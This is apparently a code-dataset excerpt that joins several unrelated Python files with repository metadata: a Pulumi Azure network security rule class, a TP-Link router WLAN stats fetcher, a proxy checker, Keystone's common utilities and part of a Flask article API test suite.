pulumi.Alias(type_="azure-nextgen:network/v20200801:SecurityRule"), pulumi.Alias(type_="azure-native:network/v20201101:SecurityRule"), pulumi.Alias(type_="azure-nextgen:network/v20201101:SecurityRule")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(SecurityRule, __self__).__init__(
'azure-native:network/v20200401:SecurityRule',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'SecurityRule':
"""
Get an existing SecurityRule resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = SecurityRuleArgs.__new__(SecurityRuleArgs)
__props__.__dict__["access"] = None
__props__.__dict__["description"] = None
__props__.__dict__["destination_address_prefix"] = None
__props__.__dict__["destination_address_prefixes"] = None
__props__.__dict__["destination_application_security_groups"] = None
__props__.__dict__["destination_port_range"] = None
__props__.__dict__["destination_port_ranges"] = None
__props__.__dict__["direction"] = None
__props__.__dict__["etag"] = None
__props__.__dict__["name"] = None
__props__.__dict__["priority"] = None
__props__.__dict__["protocol"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["source_address_prefix"] = None
__props__.__dict__["source_address_prefixes"] = None
__props__.__dict__["source_application_security_groups"] = None
__props__.__dict__["source_port_range"] = None
__props__.__dict__["source_port_ranges"] = None
return SecurityRule(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def access(self) -> pulumi.Output[str]:
"""
The network traffic is allowed or denied.
"""
return pulumi.get(self, "access")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
A description for this rule. Restricted to 140 chars.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="destinationAddressPrefix")
def destination_address_prefix(self) -> pulumi.Output[Optional[str]]:
"""
The destination address prefix. CIDR or destination IP range. Asterisk '*' can also be used to match all source IPs. Default tags such as 'VirtualNetwork', 'AzureLoadBalancer' and 'Internet' can also be used.
"""
return pulumi.get(self, "destination_address_prefix")
@property
@pulumi.getter(name="destinationAddressPrefixes")
def destination_address_prefixes(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The destination address prefixes. CIDR or destination IP ranges.
"""
return pulumi.get(self, "destination_address_prefixes")
@property
@pulumi.getter(name="destinationApplicationSecurityGroups")
def destination_application_security_groups(self) -> pulumi.Output[Optional[Sequence['outputs.ApplicationSecurityGroupResponse']]]:
"""
The application security group specified as destination.
"""
return pulumi.get(self, "destination_application_security_groups")
@property
@pulumi.getter(name="destinationPortRange")
def destination_port_range(self) -> pulumi.Output[Optional[str]]:
"""
The destination port or range. Integer or range between 0 and 65535. Asterisk '*' can also be used to match all ports.
"""
return pulumi.get(self, "destination_port_range")
@property
@pulumi.getter(name="destinationPortRanges")
def destination_port_ranges(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The destination port ranges.
"""
return pulumi.get(self, "destination_port_ranges")
@property
@pulumi.getter
def direction(self) -> pulumi.Output[str]:
"""
        The direction of the rule. The direction specifies if the rule will be evaluated on incoming or outgoing traffic.
"""
return pulumi.get(self, "direction")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[str]:
"""
A unique read-only string that changes whenever the resource is updated.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def name(self) -> pulumi.Output[Optional[str]]:
"""
The name of the resource that is unique within a resource group. This name can be used to access the resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def priority(self) -> pulumi.Output[Optional[int]]:
"""
The priority of the rule. The value can be between 100 and 4096. The priority number must be unique for each rule in the collection. The lower the priority number, the higher the priority of the rule.
"""
return pulumi.get(self, "priority")
@property
@pulumi.getter
def protocol(self) -> pulumi.Output[str]:
"""
Network protocol this rule applies to.
"""
return pulumi.get(self, "protocol")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
The provisioning state of the security rule resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="sourceAddressPrefix")
def source_address_prefix(self) -> pulumi.Output[Optional[str]]:
"""
The CIDR or source IP range. Asterisk '*' can also be used to match all source IPs. Default tags such as 'VirtualNetwork', 'AzureLoadBalancer' and 'Internet' can also be used. If this is an ingress rule, specifies where network traffic originates from.
"""
return pulumi.get(self, "source_address_prefix")
@property
@pulumi.getter(name="sourceAddressPrefixes")
def source_address_prefixes(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The CIDR or source IP ranges.
"""
return pulumi.get(self, "source_address_prefixes")
@property
@pulumi.getter(name="sourceApplicationSecurityGroups")
def source_application_security_groups(self) -> pulumi.Output[Optional[Sequence['outputs.ApplicationSecurityGroupResponse']]]:
"""
The application security group specified as source.
"""
return pulumi.get(self, "source_application_security_groups")
@property
@pulumi.getter(name="sourcePortRange")
def source_port_range(self) -> pulumi.Output[Optional[str]]:
"""
The source port or range. Integer or range between 0 and 65535. Asterisk '*' can also be used to match all ports.
"""
return pulumi.get(self, "source_port_range")
@property
@pulumi.getter(name="sourcePortRanges")
def source_port_ranges(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The source port ranges.
"""
return pulumi.get(self, "source_port_ranges")
| 60.031484
| 4,975
| 0.701081
|
794fd5d9e256b9f7163d7a29fc7267a43414d5a0
| 2,152
|
py
|
Python
|
tplink_wr/fetchers/wlan.py
|
n1k0r/tplink-wr-api
|
7f4e29b4b08cf6564b06d9bc3381ab5682afd83f
|
[
"MIT"
] | 5
|
2021-11-02T13:13:10.000Z
|
2021-12-14T14:13:28.000Z
|
tplink_wr/fetchers/wlan.py
|
n1k0r/tplink-wr-api
|
7f4e29b4b08cf6564b06d9bc3381ab5682afd83f
|
[
"MIT"
] | null | null | null |
tplink_wr/fetchers/wlan.py
|
n1k0r/tplink-wr-api
|
7f4e29b4b08cf6564b06d9bc3381ab5682afd83f
|
[
"MIT"
] | null | null | null |
from dataclasses import dataclass
from tplink_wr.parse.utils import extract_vars
from tplink_wr.router import RouterInterface
from .fetcher import Fetcher
@dataclass
class WLANStats(Fetcher):
ssid: list[str]
mac_filter_enabled: bool
mac_filter_whitelist: bool
clients: list
@classmethod
def fetch(cls, router: RouterInterface):
last = stats_raw = cls._load_page(router, 1)
while not last["last_page"]:
last = cls._load_page(router, last["page_num"]+1)
stats_raw["clients"] += last["clients"]
stats = cls(
ssid=[
str(ssid)
for ssid in stats_raw["ssid"]
],
mac_filter_enabled=bool(
stats_raw["mac_filter_enabled"]
),
mac_filter_whitelist=bool(
stats_raw["mac_filter_whitelist"]
),
clients=stats_raw["clients"],
)
return stats
@staticmethod
def _load_page(router: RouterInterface, page: int) -> dict:
doc = router.page("WlanStationRpm", params={"Page": page})
wlan_para, host_list, ssid_list = extract_vars(doc, [
"wlanHostPara", "hostList", "ssidList"
]).values()
clients_count = wlan_para[0]
limit_per_page = wlan_para[2]
params_per_client = wlan_para[4]
stats = {
"page_num": page,
"last_page": False,
"ssid": ssid_list,
"mac_filter_enabled": wlan_para[5],
"mac_filter_whitelist": wlan_para[6],
"clients_count": clients_count,
"clients": [],
}
clients_left = clients_count - (page - 1) * limit_per_page
this_page_count = min(clients_left, limit_per_page)
for i in range(this_page_count):
base = i * params_per_client
stats["clients"].append({
"mac": host_list[base],
"rx": host_list[base + 2],
"tx": host_list[base + 3],
})
if clients_left <= limit_per_page:
stats["last_page"] = True
return stats
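# Illustrative usage sketch (not part of the original module). Given an already
# authenticated RouterInterface instance (here called `router`, hypothetical),
# fetch() walks every result page and merges the per-page client lists:
#
#     stats = WLANStats.fetch(router)
#     print(stats.ssid, stats.mac_filter_enabled)
#     for client in stats.clients:
#         print(client["mac"], client["rx"], client["tx"])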
| 28.693333
| 66
| 0.563197
|
794fd604bb49beacb1b7ca11da994bbdb4f38580
| 3,148
|
py
|
Python
|
PyProxyToolkit/check.py
|
maxpalpal/permanrkee
|
e895fbd6a205c324ad185f607f0c43ea27e47acc
|
[
"MIT"
] | null | null | null |
PyProxyToolkit/check.py
|
maxpalpal/permanrkee
|
e895fbd6a205c324ad185f607f0c43ea27e47acc
|
[
"MIT"
] | null | null | null |
PyProxyToolkit/check.py
|
maxpalpal/permanrkee
|
e895fbd6a205c324ad185f607f0c43ea27e47acc
|
[
"MIT"
] | 1
|
2020-11-04T06:11:05.000Z
|
2020-11-04T06:11:05.000Z
|
"""
Copyright (C) 2016 Garry Lachman garry@lachman.co under GNU LGPL
https://github.com/garrylachman/PyProxyToolkit
https://rev.proxies.online
This library is free software; you can redistribute it and/or modify it under the terms of the
GNU Lesser General Public License version 2.1, as published by the Free Software Foundation.
This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU Lesser General Public License for more details.
"""
from .defines import defines
from .proxy import Proxy
from .strategies.strategyAbstract import StrategyAbstract
from .strategies.httpbinStrategy import HttpbinStrategy
from .strategies.httpbinAnonymousStrategy import HttpbinAnonymousStrategy
import logging
import http
import urllib.request, urllib.parse, urllib.error
import sys
class Check:
def __init__(self, strategy: StrategyAbstract, timeout):
self.strategy = strategy
self.timeout = timeout
self.logger = logging.getLogger(defines.LOGGER_NAME)
def check(self, proxy: Proxy):
proxy_provider = urllib.request.ProxyHandler({
'http': '{0}:{1}'.format(proxy.host, str(proxy.port)),
'https': '{0}:{1}'.format(proxy.host, str(proxy.port))
})
opener = urllib.request.build_opener(proxy_provider)
opener.addheaders = [
('User-agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36')
]
res = None
try:
res = opener.open(self.strategy.url, timeout=self.timeout)
except urllib.error.URLError as e:
self.logger.error(e)
proxy.isValid = False
if res is not None:
res.close()
return False
except http.client.HTTPException as e:
self.logger.error(e)
proxy.isValid = False
if res is not None:
res.close()
return False
except:
self.logger.error(sys.exc_info()[0])
proxy.isValid = False
if res is not None:
res.close()
return False
response=''
while True:
try:
responsePart = res.read()
except http.client.IncompleteRead as icread:
try:
response = response + icread.partial.decode('utf-8')
except:
self.logger.error(sys.exc_info()[0])
proxy.isValid = False
res.close()
return False
continue
else:
try:
response = response + responsePart.decode('utf-8')
except:
self.logger.error(sys.exc_info()[0])
proxy.isValid = False
res.close()
return False
break
res.close()
proxy.isValid = self.strategy.match(response, proxy)
return proxy.isValid
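# Illustrative usage sketch (not part of the original module). Given a strategy
# instance (e.g. one of the Httpbin* strategies imported above; their
# constructor signatures are not shown in this file) and a Proxy object:
#
#     checker = Check(strategy, timeout=10)
#     if checker.check(proxy):
#         print("proxy is alive:", proxy.host, proxy.port)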
| 36.183908
| 130
| 0.595299
|
794fd60ec4a627f30e70e38b3dc2e5f2a0357887
| 20,555
|
py
|
Python
|
keystone/common/utils.py
|
andy-ning/stx-keystone
|
d25ef53d1a152025b78dbf7780b93fe356323836
|
[
"Apache-2.0"
] | 1
|
2019-05-08T06:09:35.000Z
|
2019-05-08T06:09:35.000Z
|
keystone/common/utils.py
|
andy-ning/stx-keystone
|
d25ef53d1a152025b78dbf7780b93fe356323836
|
[
"Apache-2.0"
] | 4
|
2018-08-22T14:51:02.000Z
|
2018-10-17T14:04:26.000Z
|
keystone/common/utils.py
|
andy-ning/stx-keystone
|
d25ef53d1a152025b78dbf7780b93fe356323836
|
[
"Apache-2.0"
] | 5
|
2018-08-03T17:19:34.000Z
|
2019-01-11T15:54:42.000Z
|
# Copyright 2012 OpenStack Foundation
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 - 2012 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import calendar
import collections
import grp
import hashlib
import itertools
import os
import pwd
import uuid
from oslo_log import log
from oslo_serialization import jsonutils
from oslo_utils import reflection
from oslo_utils import strutils
from oslo_utils import timeutils
import six
from six import moves
from keystone.common import password_hashing
import keystone.conf
from keystone import exception
from keystone.i18n import _
CONF = keystone.conf.CONF
LOG = log.getLogger(__name__)
WHITELISTED_PROPERTIES = [
'tenant_id', 'project_id', 'user_id',
'public_bind_host', 'admin_bind_host',
'compute_host', 'admin_port', 'public_port',
'public_endpoint', 'admin_endpoint', ]
# NOTE(stevermar): This UUID must stay the same, forever, across
# all of keystone to preserve its value as a URN namespace, which is
# used for ID transformation.
RESOURCE_ID_NAMESPACE = uuid.UUID('4332ecab-770b-4288-a680-b9aca3b1b153')
# Compatibility for password hashing functions.
verify_length_and_trunc_password = password_hashing.verify_length_and_trunc_password # noqa
hash_password = password_hashing.hash_password
hash_user_password = password_hashing.hash_user_password
check_password = password_hashing.check_password
def resource_uuid(value):
"""Convert input to valid UUID hex digits."""
try:
uuid.UUID(value)
return value
except ValueError:
if len(value) <= 64:
if six.PY2 and isinstance(value, six.text_type):
value = value.encode('utf-8')
return uuid.uuid5(RESOURCE_ID_NAMESPACE, value).hex
raise ValueError(_('Length of transformable resource id > 64, '
'which is max allowed characters'))
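# Example (illustrative, not part of the original module): a value that already
# parses as a UUID is returned unchanged, while any other value of at most 64
# characters is mapped to a stable 32-character hex digest via uuid5 under
# RESOURCE_ID_NAMESPACE:
#
#     resource_uuid('4332ecab770b4288a680b9aca3b1b153')  # returned as-is
#     resource_uuid('default')  # deterministic uuid5 hex digest
#     resource_uuid('x' * 65)   # raises ValueError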
def flatten_dict(d, parent_key=''):
"""Flatten a nested dictionary.
Converts a dictionary with nested values to a single level flat
dictionary, with dotted notation for each key.
"""
items = []
for k, v in d.items():
new_key = parent_key + '.' + k if parent_key else k
if isinstance(v, collections.MutableMapping):
items.extend(list(flatten_dict(v, new_key).items()))
else:
items.append((new_key, v))
return dict(items)
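# Example (illustrative, not part of the original module):
#
#     flatten_dict({'identity': {'driver': 'sql', 'cache': {'ttl': 60}}})
#     # -> {'identity.driver': 'sql', 'identity.cache.ttl': 60}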
class SmarterEncoder(jsonutils.json.JSONEncoder):
"""Help for JSON encoding dict-like objects."""
def default(self, obj):
if not isinstance(obj, dict) and hasattr(obj, 'iteritems'):
return dict(obj.iteritems())
return super(SmarterEncoder, self).default(obj)
def hash_access_key(access):
hash_ = hashlib.sha256()
if not isinstance(access, six.binary_type):
access = access.encode('utf-8')
hash_.update(access)
return hash_.hexdigest()
def attr_as_boolean(val_attr):
"""Return the boolean value, decoded from a string.
We test explicitly for a value meaning False, which can be one of
several formats as specified in oslo strutils.FALSE_STRINGS.
All other string values (including an empty string) are treated as
meaning True.
"""
return strutils.bool_from_string(val_attr, default=True)
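# Examples (illustrative, not part of the original module):
#
#     attr_as_boolean('false')  # False (matches oslo strutils.FALSE_STRINGS)
#     attr_as_boolean('no')     # False
#     attr_as_boolean('')       # True (empty string is not a "false" string)
#     attr_as_boolean('junk')   # True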
def get_blob_from_credential(credential):
try:
blob = jsonutils.loads(credential.blob)
except (ValueError, TypeError):
raise exception.ValidationError(
message=_('Invalid blob in credential'))
if not blob or not isinstance(blob, dict):
raise exception.ValidationError(attribute='blob',
target='credential')
return blob
def convert_ec2_to_v3_credential(ec2credential):
blob = {'access': ec2credential.access,
'secret': ec2credential.secret}
return {'id': hash_access_key(ec2credential.access),
'user_id': ec2credential.user_id,
'project_id': ec2credential.tenant_id,
'blob': jsonutils.dumps(blob),
'type': 'ec2',
'extra': jsonutils.dumps({})}
def convert_v3_to_ec2_credential(credential):
blob = get_blob_from_credential(credential)
return {'access': blob.get('access'),
'secret': blob.get('secret'),
'user_id': credential.user_id,
'tenant_id': credential.project_id,
}
def unixtime(dt_obj):
"""Format datetime object as unix timestamp.
:param dt_obj: datetime.datetime object
:returns: float
"""
return calendar.timegm(dt_obj.utctimetuple())
def auth_str_equal(provided, known):
"""Constant-time string comparison.
:params provided: the first string
:params known: the second string
:returns: True if the strings are equal.
This function takes two strings and compares them. It is intended to be
used when doing a comparison for authentication purposes to help guard
against timing attacks. When using the function for this purpose, always
provide the user-provided password as the first argument. The time this
function will take is always a factor of the length of this string.
"""
result = 0
p_len = len(provided)
k_len = len(known)
for i in moves.range(p_len):
a = ord(provided[i]) if i < p_len else 0
b = ord(known[i]) if i < k_len else 0
result |= a ^ b
return (p_len == k_len) & (result == 0)
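# Example (illustrative, not part of the original module): pass the
# user-supplied value first, so the running time depends only on its length.
#
#     auth_str_equal('secret', 'secret')  # True
#     auth_str_equal('secret', 'Secret')  # False
#     auth_str_equal(provided_password, stored_password)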
def setup_remote_pydev_debug():
if CONF.pydev_debug_host and CONF.pydev_debug_port:
try:
try:
from pydev import pydevd
except ImportError:
import pydevd
pydevd.settrace(CONF.pydev_debug_host,
port=CONF.pydev_debug_port,
stdoutToServer=True,
stderrToServer=True)
return True
except Exception:
LOG.exception(
'Error setting up the debug environment. Verify that the '
'option --debug-url has the format <host>:<port> and that a '
'debugger processes is listening on that port.')
raise
def get_unix_user(user=None):
"""Get the uid and user name.
This is a convenience utility which accepts a variety of input
which might represent a unix user. If successful it returns the uid
and name. Valid input is:
string
A string is first considered to be a user name and a lookup is
attempted under that name. If no name is found then an attempt
is made to convert the string to an integer and perform a
lookup as a uid.
int
An integer is interpreted as a uid.
None
None is interpreted to mean use the current process's
effective user.
If the input is a valid type but no user is found a KeyError is
raised. If the input is not a valid type a TypeError is raised.
:param object user: string, int or None specifying the user to
lookup.
:returns: tuple of (uid, name)
"""
if isinstance(user, six.string_types):
try:
user_info = pwd.getpwnam(user)
except KeyError:
try:
i = int(user)
except ValueError:
raise KeyError("user name '%s' not found" % user)
try:
user_info = pwd.getpwuid(i)
except KeyError:
raise KeyError("user id %d not found" % i)
elif isinstance(user, int):
try:
user_info = pwd.getpwuid(user)
except KeyError:
raise KeyError("user id %d not found" % user)
elif user is None:
user_info = pwd.getpwuid(os.geteuid())
else:
user_cls_name = reflection.get_class_name(user,
fully_qualified=False)
raise TypeError('user must be string, int or None; not %s (%r)' %
(user_cls_name, user))
return user_info.pw_uid, user_info.pw_name
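# Examples (illustrative, not part of the original module), on a typical Linux
# system:
#
#     get_unix_user('root')  # (0, 'root')
#     get_unix_user(0)       # (0, 'root')
#     get_unix_user(None)    # uid and name of the current effective user
#     get_unix_user('no-such-user')  # raises KeyError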
def get_unix_group(group=None):
"""Get the gid and group name.
This is a convenience utility which accepts a variety of input
which might represent a unix group. If successful it returns the gid
and name. Valid input is:
string
A string is first considered to be a group name and a lookup is
attempted under that name. If no name is found then an attempt
is made to convert the string to an integer and perform a
lookup as a gid.
int
An integer is interpreted as a gid.
None
None is interpreted to mean use the current process's
effective group.
If the input is a valid type but no group is found a KeyError is
raised. If the input is not a valid type a TypeError is raised.
:param object group: string, int or None specifying the group to
lookup.
:returns: tuple of (gid, name)
"""
if isinstance(group, six.string_types):
try:
group_info = grp.getgrnam(group)
except KeyError:
# Was an int passed as a string?
# Try converting to int and lookup by id instead.
try:
i = int(group)
except ValueError:
raise KeyError("group name '%s' not found" % group)
try:
group_info = grp.getgrgid(i)
except KeyError:
raise KeyError("group id %d not found" % i)
elif isinstance(group, int):
try:
group_info = grp.getgrgid(group)
except KeyError:
raise KeyError("group id %d not found" % group)
elif group is None:
group_info = grp.getgrgid(os.getegid())
else:
group_cls_name = reflection.get_class_name(group,
fully_qualified=False)
raise TypeError('group must be string, int or None; not %s (%r)' %
(group_cls_name, group))
return group_info.gr_gid, group_info.gr_name
def set_permissions(path, mode=None, user=None, group=None, log=None):
"""Set the ownership and permissions on the pathname.
Each of the mode, user and group are optional, if None then
that aspect is not modified.
Owner and group may be specified either with a symbolic name
or numeric id.
:param string path: Pathname of directory whose existence is assured.
:param object mode: ownership permissions flags (int) i.e. chmod,
if None do not set.
:param object user: set user, name (string) or uid (integer),
if None do not set.
:param object group: set group, name (string) or gid (integer)
if None do not set.
:param logger log: logging.logger object, used to emit log messages,
if None no logging is performed.
"""
if user is None:
user_uid, user_name = None, None
else:
user_uid, user_name = get_unix_user(user)
if group is None:
group_gid, group_name = None, None
else:
group_gid, group_name = get_unix_group(group)
if log:
if mode is None:
mode_string = str(mode)
else:
mode_string = oct(mode)
log.debug("set_permissions: "
"path='%s' mode=%s user=%s(%s) group=%s(%s)",
path, mode_string,
user_name, user_uid, group_name, group_gid)
# Change user and group if specified
if user_uid is not None or group_gid is not None:
if user_uid is None:
user_uid = -1
if group_gid is None:
group_gid = -1
try:
os.chown(path, user_uid, group_gid)
except OSError as exc:
raise EnvironmentError("chown('%s', %s, %s): %s" %
(path,
user_name, group_name,
exc.strerror))
# Change permission flags
if mode is not None:
try:
os.chmod(path, mode)
except OSError as exc:
raise EnvironmentError("chmod('%s', %#o): %s" %
(path, mode, exc.strerror))
def make_dirs(path, mode=None, user=None, group=None, log=None):
"""Assure directory exists, set ownership and permissions.
Assure the directory exists and optionally set its ownership
and permissions.
Each of the mode, user and group are optional, if None then
that aspect is not modified.
Owner and group may be specified either with a symbolic name
or numeric id.
:param string path: Pathname of directory whose existence is assured.
:param object mode: ownership permissions flags (int) i.e. chmod,
if None do not set.
:param object user: set user, name (string) or uid (integer),
if None do not set.
:param object group: set group, name (string) or gid (integer)
if None do not set.
:param logger log: logging.logger object, used to emit log messages,
if None no logging is performed.
"""
if log:
if mode is None:
mode_string = str(mode)
else:
mode_string = oct(mode)
log.debug("make_dirs path='%s' mode=%s user=%s group=%s",
path, mode_string, user, group)
if not os.path.exists(path):
try:
os.makedirs(path)
except OSError as exc:
raise EnvironmentError("makedirs('%s'): %s" % (path, exc.strerror))
set_permissions(path, mode, user, group, log)
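# Example (illustrative, not part of the original module); the path, user and
# group below are hypothetical:
#
#     make_dirs('/var/run/example', mode=0o750,
#               user='keystone', group='keystone', log=LOG)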
class WhiteListedItemFilter(object):
def __init__(self, whitelist, data):
self._whitelist = set(whitelist or [])
self._data = data
def __getitem__(self, name):
"""Evaluation on an item access."""
if name not in self._whitelist:
raise KeyError
return self._data[name]
_ISO8601_TIME_FORMAT_SUBSECOND = '%Y-%m-%dT%H:%M:%S.%f'
_ISO8601_TIME_FORMAT = '%Y-%m-%dT%H:%M:%S'
def isotime(at=None, subsecond=False):
"""Stringify time in ISO 8601 format.
Python provides a similar instance method for datetime.datetime objects
called `isoformat()`. The format of the strings generated by `isoformat()`
has a couple of problems:
1) The strings generated by `isotime()` are used in tokens and other public
APIs that we can't change without a deprecation period. The strings
generated by `isoformat()` are not the same format, so we can't just
change to it.
2) The strings generated by `isoformat()` do not include the microseconds
if the value happens to be 0. This will likely show up as random
failures as parsers may be written to always expect microseconds, and it
will parse correctly most of the time.
    :param at: Optional datetime object to return as a string. If not provided,
the time when the function was called will be used.
:type at: datetime.datetime
:param subsecond: If true, the returned string will represent microsecond
precision, but only precise to the second. For example, a
`datetime.datetime(2016, 9, 14, 14, 1, 13, 970223)` will
be returned as `2016-09-14T14:01:13.000000Z`.
:type subsecond: bool
:returns: A time string represented in ISO 8601 format.
:rtype: str
"""
if not at:
at = timeutils.utcnow()
# NOTE(lbragstad): Datetime objects are immutable, so reassign the date we
# are working with to itself as we drop microsecond precision.
at = at.replace(microsecond=0)
st = at.strftime(_ISO8601_TIME_FORMAT
if not subsecond
else _ISO8601_TIME_FORMAT_SUBSECOND)
tz = at.tzinfo.tzname(None) if at.tzinfo else 'UTC'
st += ('Z' if tz == 'UTC' else tz)
return st
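# A small sketch of the difference described in the isotime() docstring
# (the datetime value is a hypothetical example):
#
#     import datetime
#     at = datetime.datetime(2016, 9, 14, 14, 1, 13, 970223)
#     at.isoformat()               # '2016-09-14T14:01:13.970223'
#     isotime(at)                  # '2016-09-14T14:01:13Z'
#     isotime(at, subsecond=True)  # '2016-09-14T14:01:13.000000Z'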
URL_RESERVED_CHARS = ":/?#[]@!$&'()*+,;="
def is_not_url_safe(name):
"""Check if a string contains any url reserved characters."""
return len(list_url_unsafe_chars(name)) > 0
def list_url_unsafe_chars(name):
"""Return a list of the reserved characters."""
reserved_chars = ''
for i in name:
if i in URL_RESERVED_CHARS:
reserved_chars += i
return reserved_chars
def lower_case_hostname(url):
"""Change the URL's hostname to lowercase."""
# NOTE(gyee): according to
# https://www.w3.org/TR/WD-html40-970708/htmlweb.html, the netloc portion
# of the URL is case-insensitive
parsed = moves.urllib.parse.urlparse(url)
# Note: _replace method for named tuples is public and defined in docs
replaced = parsed._replace(netloc=parsed.netloc.lower())
return moves.urllib.parse.urlunparse(replaced)
def remove_standard_port(url):
# remove the default ports specified in RFC2616 and 2818
o = moves.urllib.parse.urlparse(url)
separator = ':'
(host, separator, port) = o.netloc.partition(separator)
if o.scheme.lower() == 'http' and port == '80':
# NOTE(gyee): _replace() is not a private method. It has
# an underscore prefix to prevent conflict with field names.
# See https://docs.python.org/2/library/collections.html#
# collections.namedtuple
o = o._replace(netloc=host)
if o.scheme.lower() == 'https' and port == '443':
o = o._replace(netloc=host)
return moves.urllib.parse.urlunparse(o)
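# A brief sketch of how the two URL helpers above behave (the URLs are
# hypothetical examples):
#
#     lower_case_hostname('https://EXAMPLE.org:5000/v3')
#     # -> 'https://example.org:5000/v3'
#     remove_standard_port('https://example.org:443/v3')
#     # -> 'https://example.org/v3'
#     remove_standard_port('https://example.org:8443/v3')
#     # -> 'https://example.org:8443/v3' (non-default ports are kept)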
def format_url(url, substitutions, silent_keyerror_failures=None):
"""Format a user-defined URL with the given substitutions.
:param string url: the URL to be formatted
:param dict substitutions: the dictionary used for substitution
:param list silent_keyerror_failures: keys for which we should be silent
if there is a KeyError exception on substitution attempt
:returns: a formatted URL
"""
substitutions = WhiteListedItemFilter(
WHITELISTED_PROPERTIES,
substitutions)
allow_keyerror = silent_keyerror_failures or []
try:
result = url.replace('$(', '%(') % substitutions
except AttributeError:
msg = "Malformed endpoint - %(url)r is not a string"
LOG.error(msg, {"url": url})
raise exception.MalformedEndpoint(endpoint=url)
except KeyError as e:
if not e.args or e.args[0] not in allow_keyerror:
msg = "Malformed endpoint %(url)s - unknown key %(keyerror)s"
LOG.error(msg, {"url": url, "keyerror": e})
raise exception.MalformedEndpoint(endpoint=url)
else:
result = None
except TypeError as e:
msg = ("Malformed endpoint '%(url)s'. The following type error "
"occurred during string substitution: %(typeerror)s")
LOG.error(msg, {"url": url, "typeerror": e})
raise exception.MalformedEndpoint(endpoint=url)
except ValueError:
msg = ("Malformed endpoint %s - incomplete format "
"(are you missing a type notifier ?)")
LOG.error(msg, url)
raise exception.MalformedEndpoint(endpoint=url)
return result
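# A minimal sketch of the substitution performed by format_url(), assuming
# 'tenant_id' is one of the WHITELISTED_PROPERTIES (the endpoint string is
# a hypothetical example):
#
#     format_url('http://localhost:8774/v2/$(tenant_id)s',
#                {'tenant_id': 'abc123'})
#     # -> 'http://localhost:8774/v2/abc123'
#     # Unknown keys raise MalformedEndpoint unless they are listed in
#     # silent_keyerror_failures, in which case None is returned.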
def check_endpoint_url(url):
"""Check substitution of url.
    The invalid URLs are as follows:
    URLs with substitutions that are not in the whitelist.
Check the substitutions in the URL to make sure they are valid
and on the whitelist.
:param str url: the URL to validate
:rtype: None
:raises keystone.exception.URLValidationError: if the URL is invalid
"""
# check whether the property in the path is exactly the same
# with that in the whitelist below
substitutions = dict(zip(WHITELISTED_PROPERTIES, itertools.repeat('')))
try:
url.replace('$(', '%(') % substitutions
except (KeyError, TypeError, ValueError):
raise exception.URLValidationError(url)
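# A short sketch of the validation above, assuming '$(tenant_id)s' is a
# whitelisted substitution and '$(bogus_key)s' is not (both endpoint
# strings are hypothetical examples):
#
#     check_endpoint_url('http://localhost:35357/v3/$(tenant_id)s')  # passes
#     check_endpoint_url('http://localhost:35357/v3/$(bogus_key)s')
#     # raises keystone.exception.URLValidationError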
| 34.662732
| 92
| 0.636633
|
794fd691ddb3301fcce03574d769e878a2ace157
| 5,317
|
py
|
Python
|
tests/test_articles.py
|
iq9/say-so-backend-flask
|
1e463afd29bb312466d8c0e24d61152782223acf
|
[
"MIT"
] | 1
|
2021-01-03T16:13:35.000Z
|
2021-01-03T16:13:35.000Z
|
tests/test_articles.py
|
rbrooks/say-so-backend-flask
|
1e463afd29bb312466d8c0e24d61152782223acf
|
[
"MIT"
] | 1
|
2020-05-28T06:22:31.000Z
|
2020-05-28T06:22:31.000Z
|
tests/test_articles.py
|
iq9/say-so-backend-flask
|
1e463afd29bb312466d8c0e24d61152782223acf
|
[
"MIT"
] | null | null | null |
# coding: utf-8
from flask import url_for
from datetime import datetime
class TestArticleViews:
def test_get_articles_by_author(self, testapp, user):
user = user.get()
resp = testapp.post_json(url_for('user.login_user'), {'user': {
'email': user.email,
'password': 'myprecious'
}})
token = str(resp.json['user']['token'])
for _ in range(2):
testapp.post_json(url_for('articles.make_article'), {
"article": {
"title": "How to train your dragon {}".format(_),
"description": "Ever wonder how?",
"body": "You have to believe",
"tagList": ["reactjs", "angularjs", "dragons"]
}
}, headers={
'Authorization': 'Token {}'.format(token)
})
resp = testapp.get(url_for('articles.get_articles', author=user.username))
assert len(resp.json['articles']) == 2
def test_favorite_an_article(self, testapp, user):
user = user.get()
resp = testapp.post_json(url_for('user.login_user'), {'user': {
'email': user.email,
'password': 'myprecious'
}})
token = str(resp.json['user']['token'])
resp1 = testapp.post_json(url_for('articles.make_article'), {
"article": {
"title": "How to train your dragon",
"description": "Ever wonder how?",
"body": "You have to believe",
"tagList": ["reactjs", "angularjs", "dragons"]
